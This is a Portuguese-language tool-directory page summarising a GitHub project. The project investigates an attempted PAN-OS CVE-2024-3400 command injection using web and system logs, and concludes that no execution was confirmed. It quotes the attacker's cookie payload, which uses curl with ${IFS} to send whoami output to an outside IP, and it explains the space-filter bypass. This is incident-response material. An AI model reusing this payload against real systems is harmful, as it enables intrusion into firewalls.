Diretório de Ferramentas
Categorias
PAN-OS-CVE-2024-3400-Command-Injection-Investigation — Investigação de uma tentativa de injeção de comando PAN-OS CVE-2024-3400, analisando a entrega do payload, o processamento interno e a validação da execução com base em evidências de log. | Kitploit
Ferramentas / GitHub / zedocun / pan-os-cve-2024-3400-command-injection-investigation
zedocun/pan-os-cve-2024-3400-command-injection-investigation PAN-OS-CVE-2024-3400-Command-Injection-Investigation Investigação de uma tentativa de injeção de comando PAN-OS CVE-2024-3400, analisando a entrega do payload, o processamento interno e a validação da execução com base em evidências de log.
1 2 há 4 mesesDescubra as ferramentas mais usadas pela nossa comunidade.
Últimos 7 Dias Últimos 30 Dias
Investigando uma Tentativa de Injeção de Comando PAN-OS CVE-2024-3400
Visão Geral
Este projeto documenta a investigação de uma tentativa de injeção de comando CVE-2024-3400 direcionada ao serviço PAN-OS GlobalProtect.
O objetivo era determinar:
se isso é um ataque real
se houve execução de comando
se há evidências de comprometimento
Visão Geral do Alerta
Um alerta crítico foi disparado indicando uma possível tentativa de exploração.
Alvo: 172.16.17.139 (PA-Firewall-01)
Origem: 144.172.79.92
Endpoint: /global-protect/login.esp
Método: POST
Ação: Permitido
Payload Malicioso
A requisição contém um cookie manipulado:
SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)
Observações Principais
${IFS} contorna a filtragem de espaços
whoami tenta obter a identidade do sistema
curl tenta comunicação externa
Isto é um payload de injeção de comando
Evidências do Servidor Web Os logs do Nginx confirmam que a requisição chegou ao servidor:
POST /global-protect/login.esp
HTTP 200
User-Agent: curl
A requisição maliciosa foi aceita e processada.
Processamento Interno Logs do sistema mostram que o payload alcançou a lógica interna:
Descoberta Principal
o payload foi incorporado ao comando interno (dt_curl)
uma requisição externa foi tentada
a cadeia de execução alcançou componentes internos
a consulta DNS falhou → a comunicação externa não ocorreu
Infraestrutura do Atacante
144.172.79.92
marcado como malicioso
associado a um provedor de hospedagem
Isso confirma a origem externa do ataque.
Linha do Tempo da Rede Vários IPs interagiram com o sistema antes do ataque:
Apenas 144.172.79.92 está diretamente associado à exploração.
Avaliação de Impacto
Confirmado
tentativa de exploração direcionada à CVE-2024-3400
payload malicioso entregue
requisição processada pelo servidor
payload alcançou o processamento interno
tentativa de comunicação externa disparada
Não Confirmado
execução de comando no sistema operacional
saída do comando
exfiltração de dados
shell reverso
persistência
movimento lateral
Conclusão Esta foi uma tentativa real de injeção de comando .
entregar uma requisição maliciosa
injetar um payload
disparar o processamento interno
não há execução confirmada nem comprometimento do sistema
Classificação Final Tentativa de Injeção de Comando
Payload Processado - Sem Execução ou Impacto Confirmado